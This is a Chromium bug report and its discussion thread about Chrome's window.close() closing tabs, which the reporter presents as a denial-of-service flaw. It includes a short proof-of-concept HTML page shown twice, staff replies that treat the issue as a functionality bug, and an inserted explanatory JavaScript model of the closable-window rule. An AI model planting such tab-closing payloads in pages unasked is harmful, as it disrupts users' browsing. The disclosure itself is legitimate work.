Denial of service attack(window object) on Google Chrome browser
Reported by amarwagh...@gmail.com, Nov 7 2016
Issue description

VULNERABILITY DETAILS
The Google Chrome browser is vulnerable to a window object based denial of service attack. The Google Chrome browser fails to sanitize a check when the window.close() function is called in a number of dynamically generated events. The function is called in a suppressed manner and kills the parent window directly by default, which makes it vulnerable to a denial of service attack.

When an attacker sends an HTML file to a victim:

<html>
<head>
<title>Google Chrome Window Object Remote Denial of Service.</title>
</head>
<body><br><br>
<h1><center>Google Chrome Window Object Remote Denial of Service</center></h1><br><br>
<h2><center>Proof of Concept</center><br><br></h2>
<center>
Click the below link to Trigger the Vulnerability..<br><br>
<hr>
<hr>
<b><center><a href="javascript:window.close(self);">Google Chrome Window Object DoS Test POC</a></center></b>
</center>
</body>
</html>

Here the window.close() method should be sanitized and should not close the current window. I tested it in Firefox (Linux and Windows) and Chrome (Linux platform), and there this window object is validated and the current window doesn't close. This security issue is a result of a design flaw in the browser. Scripts must not close windows that were not opened by script, if script-specific code is designed. There must be a parent window confirmation check prior to closing a window.

VERSION
Chrome Version: 54.0.2840.87 m (64-bit) [stable]
Operating System: Windows 10

REPRODUCTION CASE
The attached HTML file code goes here (or you can find the attachment):

<html>
<head>
<title>Google Chrome Window Object Remote Denial of Service.</title>
</head>
<body><br><br>
<h1><center>Google Chrome Window Object Remote Denial of Service</center></h1><br><br>
<h2><center>Proof of Concept</center><br><br></h2>
<center>
Click the below link to Trigger the Vulnerability..<br><br>
<hr>
<hr>
<b><center><a href="javascript:window.close(self);">Google Chrome Window Object DoS Test POC</a></center></b>
</center>
</body>
</html>

P.S.: please let me know if you are not able to reproduce it.
Nov 7 2016
I can't repro on Mac or on Windows with Chrome 55.2883 or 56.2912. The console shows the following note: "Scripts may close only the windows that were opened by it."
Nov 7 2016
Correction: I can sometimes repro if the tab was opened via middle-click. That repro would be a dupe of Issue 6773.
Nov 7 2016
Alternate repro (works on Windows and Mac):
1. Left-click on the "View" link in comment #1; this will open the POC HTML in a new tab (we're only doing this to get a new tab that was opened with a _blank target).
2. In that new tab, navigate to https://bayden.com/test/selfclose.htm
3. In that page, observe that the back arrow is active.
4. Click the "Test POC" link.
Observe: the window closes, despite the fact that the back stack was not empty.
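To make the rule behind the console note in comment #1 and the back-stack observation in comment #3 concrete, here is an added illustrative model (not Chromium's or the reporter's code) of the "script-closable" check a browser is expected to apply before honouring window.close(): a context is closable if script opened it, or if it is top-level with a single session history entry. All class, field and method names and the sample URLs are assumptions of this model.

```javascript
// Added model (illustrative, not Chromium or spec code) of the rule that
// window.close() is honoured only for "script-closable" contexts: one that
// script itself opened, or a top-level context whose session history holds a
// single entry. Field and method names here are assumptions of this model.
class TabModel {
  constructor(openedByScript, firstUrl, isTopLevel = true) {
    this.openedByScript = openedByScript;
    this.isTopLevel = isTopLevel;
    this.history = [firstUrl]; // session history, oldest first
    this.closed = false;
    this.console = [];         // notes a browser would log
  }

  // Navigating pushes an entry, so the back arrow becomes active.
  navigate(url) {
    this.history.push(url);
  }

  // The check expected before close() is honoured.
  isScriptClosable() {
    return this.openedByScript || (this.isTopLevel && this.history.length === 1);
  }

  // Model of window.close(); returns true only if the tab actually closed.
  close() {
    if (!this.isScriptClosable()) {
      this.console.push("Scripts may close only the windows that were opened by it.");
      return false;
    }
    this.closed = true;
    return true;
  }
}

// Replays comment #3: a tab opened from a _blank link (a user action, not
// script), navigated once more so the back stack is non-empty, then closed.
function replayComment3() {
  const tab = new TabModel(false, "poc.html");
  tab.navigate("https://bayden.com/test/selfclose.htm");
  const closed = tab.close(); // expected: false, with a console note
  return { backStack: tab.history.length - 1, closed, notes: tab.console };
}

// Contrast: a tab that script opened with window.open() stays closable even
// after navigation, because it is script-created.
function replayScriptOpened() {
  const tab = new TabModel(true, "about:blank");
  tab.navigate("https://example.test/page"); // constructed URL
  return tab.close(); // expected: true
}
```

In this model the comment #3 sequence is refused (the observed Chrome behaviour of closing it anyway is the reported bug), while a script-opened tab closes as expected.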
Nov 8 2016
Nov 9 2016
Hi guys, have you got the security issue?
Nov 9 2016
Can you elaborate specifically on every step you used to reproduce the issue? How did you load the markup in question? Did you open it in a new tab? Chrome does not triage Denial-of-Service issues as security bugs: https://www.chromium.org/Home/chromium-security/security-faq#TOC-Are-denial-of-service-issues-considered-security-bugs- ... and as such this has been classified as a functionality bug. It may have the same underlying cause as Issue 6773.
Nov 9 2016
Yes, I guess it's the same as that of 6773.
Nov 11 2016
Jan 12 2017
Issue 680546 has been merged into this issue.
Jan 13 2017
Here is the proof.
Comment 1 by est...@chromium.org, Nov 7 2016
Components: Blink>DOM
Labels: -Type-Bug-Security -Restrict-View-SecurityTeam OS-Windows Type-Bug